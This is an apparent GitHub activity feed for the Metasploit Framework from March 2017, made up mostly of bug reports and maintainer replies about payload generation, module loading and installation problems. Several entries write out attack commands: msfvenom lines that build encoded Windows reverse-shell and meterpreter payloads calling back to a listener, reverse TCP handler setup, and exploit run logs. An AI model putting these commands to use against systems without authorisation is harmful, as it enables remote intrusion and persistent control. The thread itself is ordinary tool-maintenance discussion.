    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.25.31 LPORT=443 EXITFUNC=thread -f python -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x04\xa1\xb0\xb7\xEA"

## Expected behavior

generate a shellcode, or fail with a detailed message of what's the problem

## Current behavior

	No platform was selected, choosing Msf::Module::Platform::Windows from the payload
	No Arch selec

[2017-03-09 20:55] secretsquirrel opened #8082 "Enhancement: Updating MSF to support Import Table Parsing Payloads"
### Intro
This is to document a proposed MSF enhancement to include IAT parsing stubs, their supported payloads, and update Meterpreter's reflected dll loader.

### Background

At REcon Brussels I presented a method of reusing metasploit windows x86 payloads to bypass EMET EAF/Caller protections.

TL;DR
fido.py would strip off the hash api stub that is used for most windows payloads (not all) and

[2017-03-09 21:09] AddaxSoft opened #8083 "msfvenom don't encode my shellcode"
## Steps to reproduce

	msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.25.31 LPORT=4444 EXITFUNC=thread -f python -e x86/shikata_ga_nai -i 0 -b "\x00\x0a\x0d\x04\xa1\xb0\xb7\xEA"

OR

	msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.25.31 LPORT=4444 EXITFUNC=thread -f python -i 0 -b "\x00\x0a\x0d\x04\xa1\xb0\xb7\xEA"

## Expected behavior

a shellcode should have been generate

[2017-03-09 21:19] OJ commented on #8081
This is probably due to the fact that shikata ga nai does require certain op codes to be allowed for it to work, one of which is listed as a bad char in your list. If you specify an op code that's required you'll get this error.

[2017-03-09 21:40] wvu-r7 commented on #8083
You avoid badchars with an encoder.

[2017-03-09 21:48] wvu-r7 commented on #8083
Try `generic/none` if you want payload generation to fail if there are any badchars. It won't work with the badchars you specified, though.

[2017-03-09 21:48] #8083 closed

[2017-03-09 22:21] AddaxSoft commented on #8083
@wvu-r7 , ok but the `-i 0` behavior is still not logical

[2017-03-09 22:21] Sangooob opened #8085 "metasploit does not work"
/opt/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``': Cannot allocate memory - stty (Errno::ENOMEM)
	from /opt/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'
	from /opt/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rb-read

[2017-03-09 22:36] wvu-r7 commented on #8083
Why not? You're telling it to run through zero iterations of the specified encoder, so of course it's not going to remove badchars from the payload.

[2017-03-10 03:35] busterb commented on #8085
The `embedded` path is just where omnibus stashes private files, but your point still stands. Thanks!

[2017-03-10 05:12] itsmeroy2012 commented on #8075
Have the GSOC students been selected already?

[2017-03-10 07:41] wvu-r7 commented on #8075
No.

[2017-03-10 08:32] wvu-r7 commented on #8081
Ditto what @OJ said. The error may seem a little cryptic, but that's exactly what it means.

[2017-03-10 08:32] #8081 closed

[2017-03-10 12:55] ahm3dhany opened #8087 "script_mvel_rce (elastic search) exploit doesn't work"
I'm running metasploitable3 on virtualbox, kali-linux on vmware and the host os is windows 7.

Although the "script_mvel_rce" module says "The target is vulnerable" after executing "check" command, it gave me "[*] Exploit completed, but no session was created." after executing "run" or "exploit".

[code]

the target machine runs "Elasticsearch REST API 1.1.1" on port 9200:

[code]

I tried to:
[1]

[2017-03-10 13:48] #8087 closed

[2017-03-10 17:02] J0hn- opened #8089 "Unicode character in contributions"
Hi guys!

I'm newbie in Metasploit contribution and the last one I wrote was the refactoring of the tree printing in wmap plugin

I reproduced the beautiful output of the tree command on linux
This is the result (without colors):

[code]

It’s more pleasant but my problem is this…

[code]

So, my questions are: how can I do?
And why Unicode is banished?

Thanks to all for reading me and your fanta

[2017-03-10 21:17] egypt commented on #8064
I'm working on converting your module to be able to load a java payload instead of executing a command

[2017-03-10 23:55] meowmixin commented on #8064
Guys, careful on the 'vuln struts2 package', my anti-virus detected a trojan horse inside.

[2017-03-11 06:11] 5P4D3 commented on #8064
sadlyf :(
![sadlyf](https://cloud.githubusercontent.com/assets/18681023/23821143/9cfe00ca-0664-11e7-9d9e-8e3519794181.png)

[2017-03-11 06:43] wvu-r7 commented on #8064
@5P4D3: Did you install the module?

[2017-03-11 06:49] 5P4D3 commented on #8064
how to install ?? i tried to update it but still it failed to load the module..

[2017-03-11 07:08] wvu-r7 commented on #8064
@5P4D3: It isn't even in the tree yet. Drop the module in `~/.msf4/modules/exploits/multi/http`.

[2017-03-11 08:58] acinelit opened #8091 "run getgui"
I'll ask about run getgui

when i use run getgui -e i found error
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] This version of Meterpreter is not supported with this Script!

i use kali linux 2016.2
Framework: 4.13.19-dev
Console  : 4.13.19-dev

Thanks

[2017-03-11 09:17] timwr commented on #8091
Why not try what the script suggests? `run post/windows/manage/enable_rdp` ?

[2017-03-11 10:22] #8091 closed

[2017-03-11 10:35] wvu-r7 commented on #8089
Did you run `msftidy` against the WMAP plugin? `msftidy` is usually run against modules.

[2017-03-11 11:27] 5P4D3 commented on #8064
still the error exists :(

[2017-03-11 11:48] pentesterd opened #8092 "Exploit freesshd_authbypass - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cmdstager/vbs_b64"
## Steps to reproduce

1. use exploit/windows/ssh/freesshd_authbypass
2. set RHOST, RPORT, USERNAME
3. exploit

msf exploit(freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.1.104:4444
[*] 192.168.1.103:45 - Trying username 'user'
[*] 192.168.1.103:45 - Uploading payload, this may take several minutes...
[-] 192.168.1.103:45 - Exploit failed: Errno::ENOENT No such file or

[2017-03-11 12:26] itsmeroy2012 commented on #7923
Regarding the unranked exploits? On what basis are they supposed to be ranked?

[2017-03-11 12:37] h00die commented on #7923
https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking

[2017-03-11 15:16] pbarry-r7 commented on #8092
I'm able to reproduce, definitely looks like the decoder file isn't being generated as-expected.

[2017-03-11 16:40] J0hn- commented on #8089
Thank you for your reply!
Yes I run it against the WMAP plugin that I modified, I did not know that it was only for the modules!
So thanks, I will prepare my pull request!

[2017-03-11 18:20] pbarry-r7 commented on #8092
It appears that the module is failing to correctly locate vbs_b64 because it's not using the Exploit::CmdStager mixin, which knows that this file no longer lives in MSF's  data/exploits/cmdstager/ directory but rather in the [rex-exploitation gem](https://github.com/rapid7/rex-exploitation).

I need to drop off for a bit, but I'll have a small PR when I get back if you're available to test that it

[2017-03-11 18:30] pentesterd commented on #8092
I should be available to test it in about 7 hours :-) Hitting the bed now

[2017-03-11 20:46] pat556 opened #8093 "Can metasploit be classified as munition?"
Can metasploit be classified as munition?

[2017-03-11 20:59] h00die commented on #8093
Pro required an address for export restrictions, not sure about community though

[2017-03-11 22:45] busterb commented on #8093
Complex subject and not really appropriate as a github issue.

Being open source does allow the project to avoid regulation through the commerce dept. Read more https://en.wikipedia.org/wiki/Export_of_cryptography_from_the_United_States or https://en.wikipedia.org/wiki/United_States_Munitions_List.

IANAL, and your local regulations may differ.

[2017-03-11 22:45] #8093 closed

[2017-03-11 22:51] wvu-r7 commented on #8089
Reviewing your Unicode characters:

[code]

You should use the ASCII equivalents. Even though I would hope most of us are using Unicode, you can't guarantee that for every setup. I'll leave what characters we use to your artistic liberty.

[2017-03-11 23:07] wvu-r7 commented on #8089
Actually, I assume you used Unicode to improve the current tree output. Can you show the original tree output to compare against?

WMAP isn't very well supported, btw. I don't think it's been touched in years, other than for bug fixes.

[2017-03-11 23:17] wvu-r7 commented on #7923
@itsmeroy2012: When you have a question, are you doing a web search for the answer, or are you asking us first?

[2017-03-11 23:17] wvu-r7 commented on #8064
Did you reload Metasploit? This is not the place to be asking support questions, btw. Take to to IRC, please.

[2017-03-11 23:18] wvu-r7 commented on #8064
Did you reload Metasploit? This is not the place to be asking support questions, btw. Take it to IRC, please.

[2017-03-12 00:27] pbarry-r7 commented on #8092
Hey @pentesterd, I'd be interested if the following steps work for you:

1. `mkdir -p /root/.msf4/modules/exploits/windows/ssh`
1. `curl https://raw.githubusercontent.com/pbarry-r7/metasploit-framework/4e32c80e8ed9c5714a5fcb2f7bc4a237d155fa86/modules/exploits/windows/ssh/freesshd_authbypass.rb > /root/.msf4/modules/exploits/windows/ssh/freesshd_authbypass.rb`
1. start msfconsole and use the module

[2017-03-12 02:22] pentesterd commented on #8092
@pbarry-r7 Tested this and can confirm that this works

[2017-03-12 04:05] wvu-r7 commented on #8092
@pentesterd: Please see #8095. Thanks!

[2017-03-12 04:06] pbarry-r7 commented on #8092
Appreciate the feedback, @pentesterd.  That module ended up needing a few more changes than what I had made, and I just merged in some updates from @wvu-r7 if you'd be interested/willing to try them out.  Would be the same steps as I gave above, with a slight change to the second step:

2. `curl https://raw.githubusercontent.com/pbarry-r7/metasploit-framework/bc9aa141531cc5ea8f9d4d496d39df262456c3

[2017-03-12 04:16] #8092 closed

[2017-03-12 04:28] pentesterd commented on #8092
@pbarry-r7 Tried the revised module. Works as expected.

[2017-03-12 06:33] wvu-r7 commented on #8092
Thanks, @pentesterd. The fix has been merged into `master`.

[2017-03-12 07:39] itsmeroy2012 commented on #7923
I do both. But I generally prefer asking you all first.

[2017-03-12 10:20] greenhand2learn opened #8096 "mssql_login module problem"
[code]

[code]

wht ? Invalid Cred details can't be blank

[2017-03-12 10:23] #8096 closed

[2017-03-12 16:21] busterb commented on #8061
Hmm, I haven't actually seen it yet either yet. I suspect that this stack trace is actually getting caught and formatted oddly here. The trace log message should probably be a vprint_* rather than a print_*

[2017-03-12 16:28] J0hn- commented on #8089
Sadly, there is no equivalent in the ASCII table (there are in the 'extended ascii' which is Unicode too)

This is the old output :
[code]
Yes you're right, I take the character from the tree command on linux/dos

What you said is interesting. Why WMAP isn't very well supported ? Is there a better way to scan a web application ?

Thanks

[2017-03-12 17:18] adv16 commented on #8061
From whatever I tried, I can say that it handles connection termination with proper message and without printing the stack trace... And it seems to be working fine..

[2017-03-12 19:45] Swiftb0y opened #8097 "Broken on ARM (Raspberry Pi)"
I can't run anything metasploit related anymore (just msfupdate but not msfconsole or msfvenom):

Error when starting:
`/var/lib/gems/2.1.0/gems/activesupport-4.2.8/lib/active_support/dependencies.rb:274:in `require': cannot load such file -- robots (LoadError)
	from /var/lib/gems/2.1.0/gems/activesupport-4.2.8/lib/active_support/dependencies.rb:274:in `block in require'
	from /var/lib/gems/2.1.0/

[2017-03-12 21:36] thecarterb commented on #8097
As the beginning of the error message says:

You need to install the `robots` gem, so do `sudo gem install robots`.
Also for future issues, use #metasploit on IRC instead of GitHub Issues :)

[2017-03-12 21:42] thecarterb commented on #8068
Could any of the DLL hijacking methods be viable as a future module?

Reference:
https://wikileaks.org/ciav7p1/cms/page_20251107.html

[2017-03-12 23:49] barnabyjack777 commented on #8097
This looks like your getting strong armed

[2017-03-13 00:14] barnabyjack777 opened #8098 "Metasploit Demo day Defcon or Blackhat?"
If you guys had to pick which con would is the best Defcon or Blackhat which would it be?
You cant be political and say you like them both.

[2017-03-13 02:37] wvu-r7 commented on #8098
Yes.

[2017-03-13 02:37] #8098 closed

[2017-03-13 09:26] opjoshi commented on #8064
Hey,
Did  you  update Metasploit? use msfupdate
You  will see exploit like this,
**exploit/multi/http/struts_code_exec - apache  struts remote code  execution**
Kindly check

[2017-03-13 14:43] Swiftb0y commented on #8097
Thanks for the help. I assumed it couldn't be a missing gem since bundler is supposed to install them. And thanks for the IRC tipp.
And where is the .msf4 folder located? I am not able to find it.

[2017-03-13 15:46] thecarterb commented on #8097
the `.msf4` directory is a hidden directory that is made in the home directory(`$HOME`) after metasploit is run for the first time. If metasploit hasn't ran yet, you wont have it

[2017-03-13 15:53] Swiftb0y commented on #8097
I have Metasploit run multiple times but it isnt there. even if i do a find | grep ".msf4" in / it doesn't return anything

[2017-03-13 15:55] thecarterb commented on #8097
In your home directory, try `ls -a`

[2017-03-13 16:06] Swiftb0y commented on #8097
already tried it:
.              .dbus                    Music              .ssh
..             Desktop                  .netrc             .teensy
.arduino       Documents                .npm               Templates
Arduino        Downloads                oldconffiles       .themes
.arduino15     .gconf                   .oracle_jre_usage  .thumbnails
.asoundrc      .gem                     payl

[2017-03-13 16:13] thecarterb commented on #8097
Hm, I suggest doing the following things:

1. Run `msfupdate`
2. If `#1` doesn't work, uninstall and reinstall Metasploit

Also, how did you install metasploit?

[2017-03-13 16:25] Swiftb0y commented on #8097
I used Git and msfupdate didn't fix it before. Thats not so important anymore. I'm trying my luck on the IRC channel

[2017-03-13 19:00] thecarterb commented on #8097
@Swiftb0y Okay cool. (Don't forget to close the issue)

[2017-03-13 21:12] Swiftb0y commented on #8097
like this?

[2017-03-13 21:12] #8097 closed

[2017-03-13 21:32] wvu-r7 commented on #8097
@Swiftb0y: Thanks for the chat. Best of luck.

[2017-03-14 15:49] anthraxx opened #8105 "4.14.1 regression in grpc-1.1.2 aborting bunding"
## Steps to reproduce

How'd you do it?

bundle-2.3 install -j"$(nproc)" --no-cache --deployment

## Expected behavior

It should succeed to fetch and build all native extensions of the specified dependencies.

## Current behavior

It aborts because of an error (-Werror=shift-negative-value) but we do _not_ specify such (or -Werror in general) ourselves!

[code]

## System stuff

### Metasploit ve

[2017-03-14 16:31] Radrigo opened #8106 "How add own payload module?"
## Steps to reproduce

Hi guys!
How i can add own payload module in msf?
If i create ~/.msf4/modules/payloads/stagers/windows/test.rb i can't see it in msf. And when i create in /usr/share/metasploit-framework/modules/payloads/stagers/windows/test.rb i have same resulte.
I need your help.

[2017-03-14 16:57] busterb commented on #8106
This isn't a support channel. Try community.rapid7.com or #metasploit on IRC

[2017-03-14 16:57] #8106 closed

[2017-03-14 16:58] busterb commented on #8105
what target OS / architecture are you building on?

[2017-03-14 17:22] anthraxx commented on #8105
it was the i686 variant (32bit) of the metasploit package (i need this for packaging, i  don't use 32bit :stuck_out_tongue_closed_eyes: )

[2017-03-14 17:30] wvu-r7 commented on #8089
What I meant is to use characters from the ASCII set to build a similar-looking tree. Like `ps f` or `pstree`. I won't lose any sleep over using Unicode, though, since it's 2017.

Your new tree looks awesome, but if you look at how `tree` does it, Unicode is just one of many supported charsets:

[code]

Perhaps you should have a compat mode.

[2017-03-14 17:31] wvu-r7 commented on #8089
Metasploit isn't really a web scanner. It never was. We support WMAP insofar as we'll maintain it, but no new features are being added to it. Until now. ^^

[2017-03-14 17:51] wvu-r7 commented on #8089
Looks like you already added a compat mode! Thanks!!

[2017-03-14 18:03] wvu-r7 commented on #8089
Consider this matter resolved. Moving to #8104.

[2017-03-14 18:03] #8089 closed

[2017-03-14 19:56] jeffmcjunkin opened #8109 "post/windows/manage/migrate doesn't migrate to NAME variable; PID works"
## Steps to reproduce

How'd you do it?

1. Established windows/meterpreter/reverse_https session against modern.ie Windows 10 (Build 14393) system. Server is Ubuntu 16.04 x64 with MSF (version `4.14.2+20170313172527.git.2.6832f3f~1rapid7-1`) installed via https://github.com/trustedsec/ptf.
2. Attempted to run post/windows/manage/migrate to explorer.exe.
3. Module failed with "Process or PID not f

[2017-03-14 20:06] h00die commented on #8109
Going to take a 2 second stab in the dark on this one, `explorer.exe` vs `Explorer.EXE`

[2017-03-14 20:17] busterb commented on #8105
got it, would you mind verifying if #8101 resolves the issue for you?

[2017-03-14 20:31] jeffmcjunkin commented on #8109
Sorry, I meant to include that in my `irb` output in the original issue. I don't think that's it:

[code]

[2017-03-14 21:02] busterb commented on #8105
Should be fixed now that we've added a whitelist for platforms that don't match the prebuild gem binaries. This is a new feature that shouldn't break anything else if it's omitted for now.

[2017-03-14 21:09] anthraxx commented on #8105
hm I'm not quite sure i understood the whole context of the fix, does that mean I'm pulling pre-compiled binaries now? Because I actually want to build everything from source rather then take some binary artifacts :stuck_out_tongue_closed_eyes:

[2017-03-14 21:11] #8064 closed

[2017-03-14 21:13] busterb commented on #8105
The problem is that the currently-released version of the grpc gem builds with -Werror hardcoded in cflags, which causes the whole build to fail if your compiler generates a warning. But, the 'metasploit-aggregator' gem is somewhat optional anyway, and grpc should be fixed in their upcoming release on the 20th. For now, this is the best we can do, shy of suggesting you use a different compiler for

[2017-03-14 21:34] anthraxx commented on #8105
I see, well doesn't look like clang likes it either :smile_cat: I try to append that to the release tarball Gemfile.lock thingie until the next release

[2017-03-14 22:46] pbarry-r7 commented on #7267
So I looked into this, it appears to be working correctly.  When I connect to my OpenVAS server via the MSF plugin, I see valid IDs (which do look like UUIDs, but it's still valid to call them IDs, IMO), and I can log into the OpenVAS UI via my Chrome browser and verify those IDs are, indeed, ones associated with the information I'm getting from the plugin.

W.r.t. to your example of `openvas_task

[2017-03-14 23:03] perfectst0rm opened #8111 "windows/meterpreter/reverse_tcp gets stuck on "Sending Stage""
I am running windows/meterpreter/reverse_tcp in a Kali Linux VirtualBox and I seem to consistently get these results:

http://imgur.com/a/62rfu

Any advice?

Listener:
LHOST public IP
LPORT 443
/etc/init.d/postgresql start
msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

Payload/executable Made by creating bat file + powershell:

LHOST = public ip
LPORT = 443

wi

[2017-03-14 23:33] rwhitcroft commented on #8111
Please provide output of `show options` in the handler module, and describe how you're running the payload on the "victim" side. If you used msfvenom to create an .exe, please paste the command you used.

[2017-03-15 00:39] wvu-r7 commented on #8111
This looks familiar. Do you remember, @busterb?

[2017-03-15 00:51] GabrielTK opened #8112 "Metasploit (Pro) - Persistence??"
Hey Guys, sorry, I need some help using post/windows/manage/persistence_exe (or even post/pro/multi/agent or something else) to keep a meterpreter shell persistant now that scripts are deprecated. I've tried both but I can't figure out how they work!

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [X ] Commercial/Community installer (from http://www

[2017-03-15 00:54] adv16 commented on #8060
this looks similar to #8061  @leebaird  are you able to reproduce these?

[2017-03-15 02:19] perfectst0rm commented on #8111
Sorry no, I don't follow.

[2017-03-15 03:30] wvu-r7 commented on #8111
You don't have to, since you're not @busterb. :-)

[2017-03-15 08:42] void-in commented on #8112
@GabrielTK This isn't a support forum. For pro, use their dedicated support channel. For MSF help, use https://community.rapid7.com.

[2017-03-15 08:42] #8112 closed

[2017-03-15 09:09] vvadher commented on #8064
Is there any way to fix this issue rather having upgrade to 2.3.32 or 2.5.10.1

[2017-03-15 09:10] ankurloriya commented on #8064
Is there any way to fix this issue rather having upgrade to 2.3.32 or 2.5.10.1?

[2017-03-15 09:17] lukaszlenart commented on #8064
The simplest way is to filter out all incoming requests with invalid `ContentType`

[2017-03-15 09:25] lukaszlenart commented on #8064
or implement a custom `Multipart` parser
http://stackoverflow.com/questions/8937986/how-to-use-custom-struts-multipart-parser/42805618#42805618
https://struts.apache.org/docs/handling-file-uploads.html

[2017-03-15 09:37] GabrielTK commented on #8112
Ok, thx :D

On Mar 15, 2017 5:42 AM, "Waqas Ali" <notifications@github.com<mailto:notifications@github.com>> wrote:

@GabrielTK<https://github.com/GabrielTK> This isn't a support forum. For pro, use their dedicated support channel. For MSF help, use https://community.rapid7.com.

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub<https://github.com

[2017-03-15 21:52] busterb commented on #8111
@wvu-r7 this will happen among other things if you use reverse_tcp_rc4 with the wrong key.

[2017-03-15 22:55] perfectst0rm commented on #8111
@busterb how do I fix this, its some key I used wrong?

[2017-03-15 22:57] perfectst0rm commented on #8111
"Errno::EPIPE Broken pipe - SSL accept" now

[2017-03-16 12:25] lmehai commented on #8064
If your application server is behind  Apache server you can unset Content-type like this:
         <IfModule mod_headers.c>
             RequestHeader unset Content-Type
       </IfModule>

If you application server is not behind a web server you can commented the file upload intercepted in
by defining a custom interceptor-stack:
https://dzone.com/tutorials/java/struts-2/struts-2-tutorial/struts-2

[2017-03-16 16:46] otofoto opened #8120 "bavision_cam_login"
## Steps to reproduce
[code]

## System stuff

### Metasploit version

latest

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ x] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

Windows

[2017-03-16 16:49] busterb commented on #8120
This looks like it came from Metasploit Pro. Do you have a support contact with R7 for that?

[2017-03-16 18:33] leebaird opened #8121 "stack trace - canon_iradv_pwd_extract"
## Steps to reproduce

[code]

## System stuff
### Metasploit version
metasploit v4.14.1-dev

### I installed Metasploit with:
- [ ] Kali package via apt

### OS
Kali rolling

[2017-03-16 18:54] droidvoider opened #8122 "CVE-2016-5195 - dirtycow + Android 6.01 -- Does metasploit have any cool tools?"
The only way I know to use metasploit is when someone puts up a tutorial and I have no knowledge of a list or index of Android + metasploit exploits. Can someone help me with the right things to Google?

I'm trying to root Android 6.01 phones with locked bootloaders. Any tools that would help me gather information or gain root + context would likely give me ideas. I'm currently working with farm-r

[2017-03-17 04:19] wwebb-r7 commented on #8122
There was a lot of buzz regarding dirtycow when it was new; however, nothing more than some PoC's that barely worked were produced.  I haven't kept up with it enough to know if anyone, regardless of association with Metasploit, has published a working exploit for it.  Someone else will chime in I'm sure.

Outside of the fabulously wealthy and other corner cases, an individual would have to be very

[2017-03-17 05:06] #8034 closed

[2017-03-17 05:26] wwebb-r7 commented on #7872
Work has been in progress on this.  Closing.

[2017-03-17 05:26] #7872 closed

[2017-03-17 07:45] shucon commented on #8075
I am interested to work on this issue .
I am new to git community kindly help to work on it .

[2017-03-17 09:19] FireFart opened #8123 "Missing Error checking in mssql_clr_payload"
The  mssql_clr_payload module (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/mssql/mssql_clr_payload.rb) is missing some error checking on enabling database features.

I added some debug output to `enable_clr` and `set_trustworthy` to see the error message returned.

Sorry for the german SQL server version, but it's the one I tested it with.

Pinging @OJ for t

[2017-03-17 10:35] verico1 opened #8124 "Failed to load module:"
verico@oem-Aspire-V5-571G:/$ sudo msfconsole
[sudo] password for verico:

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990

[2017-03-17 12:07] busterb commented on #8124
there's no such thing as a module called 'exploits', the message is correct. Suggest reading something like this first: https://www.offensive-security.com/metasploit-unleashed/

[2017-03-17 12:07] #8124 closed

[2017-03-17 12:14] verico1 commented on #8124
@busterb

The better explain

I am correct

Please example Stir

[2017-03-17 13:37] ucheakajiuba commented on #5557
please how do i fix this issue , my kali is up to date and stillt happens

[2017-03-17 13:45] pbarry-r7 commented on #5557
Please don't comment on issues that were closed almost 2 years ago.  If you are looking for support, please visit us on the [community website](https://community.rapid7.com/community/metasploit) (where we have many guides and tutorials, as well as blog posts, and take support questions) or in the #metasploit IRC channel.  Thanks.

[2017-03-17 13:48] pbarry-r7 commented on #8124
@verico1, you can also find a lot of good info here (including tutorials): https://community.rapid7.com/community/metasploit  Also, that's a more appropriate place to ask questions than GitHub.  Thanks.

[2017-03-17 14:23] ucheakajiuba commented on #5557
ok. apologies, but i need you to point me to the fix, i have been searching for it

[2017-03-17 14:40] pbarry-r7 commented on #5557
The fix was made almost two years ago and is referenced in the [PR just before your initial comment above](https://github.com/rapid7/metasploit-framework/pull/5583).  Kali picked it up a long time ago.  If you don't find any info on it in the community site, I encourage you to post your problem there on the community site (with info on exactly what version of Kali and Metasploit you are running, a

[2017-03-17 15:27] 0sx commented on #8080
After much frustration and digging I discovered that the call to `/opt/metasploit-framework/embedded/bin/initdb` was failing because I had changed text encoding to Latin 1 and it required UTF-8 to test something else.  After changing it back to UTF-8 I manually called `initdb` with the arguments `msfdb` does in `create_db`.  The role msf did not exist so I ran `msfdb reinit` and `msfconsole` then

[2017-03-17 15:27] #8080 closed

[2017-03-17 16:44] busterb commented on #8080
Hmm, is there something we should change in msfdb? Certainly willing to improve it. It's in the rapid7/metasploit-omnibus project

[2017-03-17 17:32] #8061 closed

[2017-03-17 17:36] wwebb-r7 commented on #8068
The DLL hijacking modules listed are obviously intended for covert data exfiltration by people who already have ongoing physical access to a system.  It would make very little sense to wrap this functionality into a Metasploit module for our typical users, and even less sense for an intelligence operative.

As for the value of making a module intended to be deployed remotely, there are some corner

[2017-03-17 18:26] Ex911 opened #8125 "Metaspolit Console crashes !"
I've Installed Metasploit Pro on Windows 10 .. but everytime I run "Console" it crashes with errors ..
such as ruby ... etc.

and Web working with me . idk where's the problem exactly .. and I've installed it for 4 times XD

### OS
Windows 10

Any help ? XD

[2017-03-17 18:38] wvu-r7 commented on #8125
If you are a Pro user, and you are a customer, you should contact support first.

[2017-03-17 18:42] Ex911 commented on #8125
I've tried customer user first .. but got the same issue .
so .. "Pro" or "customer" doesn't make a difference for OS .. I guess. ^^

[2017-03-17 19:01] wwebb-r7 commented on #8125
Perhaps a screenshot of the errors you're receiving is in order.

[2017-03-17 20:30] pbarry-r7 commented on #8125
@Ex911, I think what @wvu-r7 is getting at is that if you're a Rapid7 customer, your best route for help would be contacting Rapid7 support.

[2017-03-17 21:38] jmartin-r7 commented on #7648
@TheMayhamLab sorry for the long delay here, if you still have details can you describe the configuration of the target?

I tested this against Window 2012 R2 and Ubuntu Linux 16.04 snmp services and get only valid results.  I validated against systems with community strings with and without the ```@```.

I suspect the target system details may give me further insight as to where to target.

[2017-03-17 22:04] busterb commented on #7879
Hi, is it possible for you to put your script somewhere else? The 4shared link does not appear reliable.

[2017-03-17 23:22] wvu-r7 commented on #7648
Thank you for the insight, @jmartin-r7! I was not able to repro myself. Apologies.

[2017-03-18 10:11] jmhickman opened #8127 "post/linux/gather/enum_system faults on use"
## Steps to reproduce

How'd you do it?

1. Established mettle x86 reverse TCP session from target
2. backgrounded session, loaded up `post/linux/gather/enum_system` module, set SESSION var to mettle meterpreter session
3. Ran module

## Expected behavior
Output enumerating the target through the active session

## Current behavior
[code]

## System stuff
Target is Ubuntu 12.04, running kernel 3.2

[2017-03-18 16:14] susliks1 commented on #8120
No this is community edition. Bavision_cam_login doesn't seem to run with default settings.

[2017-03-18 18:54] h00die commented on #8121
Let me know if that PR fixes the issue, should be a simple check of the variable before trying to access it.

[2017-03-18 18:57] h00die commented on #8022
this was fixed right, can we close it?

[2017-03-18 18:58] #7924 closed

[2017-03-18 21:11] fredondiek commented on #8064
quick fix  https://github.com/fredondiek/struts2_rce_attack_filter

[2017-03-18 21:58] wvu-r7 commented on #8022
Not until #8031 lands. I'm still tracking down some remaining `nil` bugs. I'm seeing sporadic `get_current_data_pids` failures still.

[2017-03-18 22:04] rwhitcroft commented on #8127
I can't reproduce this. Are you sure the session was fully established and working before you ran the post module?

[2017-03-19 11:17] jmhickman commented on #8127
Yes. I went back to the session after the error and worked with a shell for another 20-30 min before closing the session.

I went ahead and tried it again, and this time instead of the trace I posted above, the payload on the target segfaults and the session dies as soon as I run the post module. Before running the module I can interact with the session normally, or even just leave it idle, and no

[2017-03-19 11:40] itsmeroy2012 commented on #7129
I would like to work on the documentation of this exploit. What would be displayed if I get a successful session?

[2017-03-20 02:35] timwr commented on #8127
I suspect this is caused by: https://github.com/rapid7/mettle/issues/64
We'll get the fix for this out asap.

[2017-03-20 02:46] timwr commented on #8122
Hi @droidvoider
We had https://github.com/rapid7/metasploit-framework/pull/7478 up for a while. Feel free to test it. If there is interest I'll see if I can improve it.
It's unclear what the best method on Android is. On 64bit devices with vdso we can replace gettimeofday in the vdso table with shellcode. What do you recommend for 32bit devices with selinux?

[2017-03-20 03:18] #8121 closed

[2017-03-20 03:38] #8022 closed

[2017-03-20 09:55] itsmeroy2012 commented on #7132
Working on the docs now.. will land a PR by today.

[2017-03-20 14:13] lukaszlenart commented on #8064
We have released two plugins that can help you fix this vulnerability in your Struts version (without a need to migrate) - it's safer than a custom Servlet filter as there are other attack vectors.
http://struts.apache.org/announce.html#a20170320

[2017-03-20 16:51] itsmeroy2012 commented on #8075
1.The PHP code is already present in the new repository at rapid7/metasploit-payloads. Do we have to move something else too?
2. I am unable to 'make install-php' payloads in the repo metasploit-payloads after cloning it.
3. Regarding the merging the functionality portion, How do I test whether it works or not in metasploit-payloads, is there 'rake spec' there too?

[2017-03-20 16:57] busterb commented on #8075
Please look at the original PR carefully. It adds a file called data/meterpreter/meterpreter_ssl.php, the contents of which should be inside if metasploit-payloads now.

If your install works correctly, you should see something like this:
[code]

[2017-03-20 16:58] busterb commented on #8075
To test this, you would of course check out the original PR, and devise a test plan for starting the payload, ensuring it works in different environments. You might ping @bwatters-r7 to facilitate some automatic testing of PHP payloads.

[2017-03-20 17:00] sempervictus commented on #8075
I wrote the SSL code a long time ago and dumped it into the framework PR queue just to have it on the record. The proper way (IMO) to do this is to have the php code compose the meterpreter to be used on the fly including only the requisite transport pieces to reduce size and increase on the wire entropy.

Essentially an ERB template which conditionally interpolates the needed code segments and va

[2017-03-20 17:59] pyrohaz4good commented on #7726
Bumping this thread again.  Any chance for input?

[2017-03-20 18:54] itsmeroy2012 commented on #8075
So I'll have to try to merge the functionality of the files meterpreter.php and the meterpreter_ssl.php ?? @busterb  @sempervictus

[2017-03-20 19:16] timosupremo opened #8133 "Windows meterpreter portfwd not working with TCP transport"
The `portfwd` function does not appear to work correctly against Windows targets in the latest version of the framework.  TCP transports appear to be affected the most, though the issue may also affect HTTP/HTTPS transports in some circumstances.  Versions 4.14.0 and prior do not appear to be affected.

## Steps to Reproduce
1. Gain a meterpreter on a Windows machine with a `windows/meterpreter/re

[2017-03-20 21:24] busterb commented on #8133
Thanks for the bisect for the known-working version, that helps a lot!

